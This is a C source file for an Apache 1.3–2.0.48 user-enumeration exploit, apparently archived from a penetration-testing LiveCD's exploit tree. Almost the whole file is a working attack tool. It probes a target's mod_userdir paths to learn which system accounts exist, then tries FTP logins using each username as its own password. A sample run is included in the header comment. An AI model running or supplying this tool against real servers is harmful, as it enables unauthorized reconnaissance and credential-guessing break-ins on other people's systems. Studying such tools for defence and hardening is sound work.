Chip 2007 January, February, March & April

home *** CD-ROM | disk | FTP | other *** search

/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / webserver / apache / apacheIddisclosure.c < prev next >

Wrap

C/C++ Source or Header | 2005-02-12 | 7KB | 303 lines

/* m00-apache-w00t.c * * Apache 1.3.*-2.0.48 remote users disclosure exploit by m00 Security. * ~ Proof-of-Concept edition ~ * * This tool scans remote hosts with httpd (apache) and disclosure information * about existens users accounts via wrong default configuration of mod_userdir * (default apache module). Then attempts to log on ftp with found logins. * * Works only against Linux and *BSD boxes. * Info: http://archives.neohapsis.com/archives/vuln-dev/2000-q3/0065.html * This is old, but curentlly still actual problem, because 99% of all admins use * default configuration of apache http server. * * This tool scans remote hosts with httpd (apache) and disclosure information * about existens users accounts via wrong default configuration of mod_userdir * (default apache module). Then attempts to log on ftp with found logins. * * -d4rkgr3y * * sh-2.05b$ ./m00-apache-w00t -t localhost -u test_userlist.txt -b * * [*] Apache 1.3.*-2.0.48 remote users disclosure exploit by m00 Security. * * [*] Checking http server [localhost:80]... * Apache => yes * Vulnerable => yes * OS => Mandrake Linux * [*] Searching for system accounts... * sergey => * m00 => * satan => yes * evil => * poison => * god => * guest => * dima => * ftp => yes * vasya => * rst => * vasi => * [*] Searching complete. * 12 users checked * 2 users found * [*] Attempting to log on ftp with login:login... * satan:satan => no * ftp:ftp => no * [*] Complete. * 0 ftp accounts found * */ #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <errno.h> #include <sys/socket.h> #include <sys/types.h> #include <netinet/in.h> #include <netdb.h> #define DEFAULT_HTTP_PORT 80 #define DEFAULT_FTP_PORT 21 int m00() { printf("\n[*] Apache 1.3.*-2.0.48 remote users disclosure exploit by m00 Security.\n\n"); printf("\n[*] Downloaded on www.K-OTIK.com\n\n"); } int verbose(char *d) { printf("+-----------------------o0o-----------------------+\n"); printf("\n%s",d); printf("+-----------------------o0o-----------------------+\n"); } int usage(char *xplname) { printf("[~] usage: %s -t <host> -u <userlist> [options]\n\n",xplname); printf("Options:\n"); printf("-p <port> - http port [80]\n"); printf("-l <log_file> - log all attempts to file\n"); printf("-b - try to log on ftp with guessed logins (public version only login:login)\n"); printf("-h - usage\n"); printf("\n"); exit(0); } int attempt(char *argv); int conn(char *ip, unsigned short port) { struct hostent *hs; struct sockaddr_in sock; int sockfd; bzero(&sock, sizeof(sock)); sock.sin_family = AF_INET; sock.sin_port = htons(port); if ((sock.sin_addr.s_addr=inet_addr(ip))==-1) { if ((hs=gethostbyname(ip))==NULL) { perror("[-] Error"); exit(0); } sock.sin_family = hs->h_addrtype; memcpy((caddr_t)&sock.sin_addr.s_addr,hs->h_addr,hs->h_length); } if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0){ perror("[-] Error"); exit(0); } if(connect(sockfd, (struct sockaddr *)&sock, sizeof(sock)) < 0){ perror("[-] Error "); exit(0); } return(sockfd); } int main(int argc, char *argv[]) { FILE *userlist, *logfile; char *file=NULL; char *lfile=NULL; char *host=NULL; char buf[0x20], check[0x20], request[0xc8], answer[0x3e8], c,logd[0x30]; int i,hand,x,f,v=0,brute=0; int port = DEFAULT_HTTP_PORT; int fport = DEFAULT_FTP_PORT; char c200[0x05] = "\x20\x32\x30\x30\x20"; char c403[0x0e] = "\x34\x30\x33\x20\x46\x6f" "\x72\x62\x69\x64\x64\x65\x6e"; char c404[0x0e] = "\x34\x30\x34\x20\x4e\x6f\x74" "\x20\x46\x6f\x75\x6e\x64"; char signature[0x0f] = "\x53\x65\x72\x76\x65\x72\x3a" "\x20\x41\x70\x61\x63\x68\x65"; char *http = "Accept: */*\r\n" "Accept-Language: en-us,en;q=0.5\r\n" "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n" "User-Agent: m00-apache-finger\r\n" "Connection: close\r\n\r\n"; char **logz; m00(); if(argc<2) usage(argv[0]); while((c = getopt(argc, argv, "t:u:hp:vbl:"))!= EOF) { switch (c) { case 't': host=optarg; break; case 'u': file=optarg; break; case 'p': port=atoi(optarg); break; case 'l': lfile=optarg; break; case 'b': brute=1; break; case 'v': v=1; break; case 'h': usage(argv[0]); return 1; default: usage(argv[0]); return 1; } } if(host==NULL) { usage(argv[0]); } if(file==NULL) { usage(argv[0]); } if(lfile && (logfile = fopen(lfile, "a")) == 0) { printf("[-] unable to open logfile [%s]\n",lfile); exit(0); } if((userlist = fopen(file, "r")) == 0) { printf("[-] unable to open userlist [%s]\n",file); exit(0); } logz = (char **)malloc(0x666); printf("[*] Checking http server [%s:%i]...\n",host,port); hand = conn(host,port); sprintf(request,"HEAD /~root HTTP/1.1\r\nHost: %s\r\n%s",host,http); write(hand,request,strlen(request)); recv(hand,answer,0x3e8,0); if(v) verbose(answer); printf(" Apache => "); if(!strstr(answer,signature)) { printf(" no\n Vulnerable => "); } else printf(" yes\n Vulnerable => "); if(!strstr(answer,c403)) { printf("no\n[-] Exiting...\n"); exit(0); } else printf("yes\n"); close(hand); hand = conn(host,port); sprintf(request,"HEAD /~toor HTTP/1.1\r\nHost: %s\r\n%s",host,http); write(hand,request,strlen(request)); recv(hand,answer,0x3e8,0); if(v) verbose(answer); printf(" OS => "); if(strstr(answer,c403)) { printf("FreeBSD"); } else { if(strstr(answer,"Unix")) printf("Unix unknow"); if(strstr(answer,"Debian")) printf("Debian Linux"); if(strstr(answer,"RedHat")) printf("RedHat Linux"); if(strstr(answer,"mdk")) printf("Mandrake Linux"); } close(hand); printf("\n[*] Searching for system accounts..."); if(lfile) { sprintf(logd,"Host: %s\nFound accounts:\n",host); fprintf(logfile,logd); } x=0; f=0; while (1) { fgets(buf, 32, userlist); if (buf[0] == '\n' || strstr(check,buf)) break; strcpy(check,buf); buf[strlen(buf)-1] = '\0'; x++; printf("\n %s \t=> ",buf); hand = conn(host,port); sprintf(request,"HEAD /~%s HTTP/1.1\r\nHost: %s\r\n%s",buf,host,http); write(hand,request,strlen(request)); recv(hand,answer,0x3e8,0); if(v) verbose(answer); if(!strstr(answer,c404)) { printf(" yes",buf); if(lfile) { sprintf(logd,"%s\n",buf); fprintf(logfile,logd); } logz[f] = (char *)malloc(strlen(buf)); memcpy(logz[f],buf,strlen(buf)); memset(logz[f]+strlen(buf),0x0,1); f++; } close(hand); } fclose(userlist); printf("\n[*] Searching complete.\n"); printf(" %i users checked\n %i users found\n",x,f); if(brute && f>0) { x=0; i=0; if(lfile) { sprintf(logd,"FTP:\n"); fprintf(logfile,logd); } printf("[*] Attempting to log on ftp with login:login...\n"); while(x!=f) { printf(" %s:%s \t=>",logz[x],logz[x]); hand = conn(host,fport); sprintf(request,"USER %s\n",logz[x]); write(hand,request,strlen(request)); recv(hand,answer,0x3e8,0); sprintf(request,"PASS %s\n",logz[x]); write(hand,request,strlen(request)); recv(hand,answer,0x3e8,0); if(strstr(answer,"230")) { printf(" yes\n"); if(lfile) { sprintf(logd,"%s:%s\n",logz[x],logz[x]); fprintf(logfile,logd); } i++; } else printf(" no\n"); close(hand); x++; } printf("[*] Complete.\n"); printf(" %i ftp accounts found\n",i); } if(lfile) { fprintf(logfile,"\n"); fclose(logfile); } }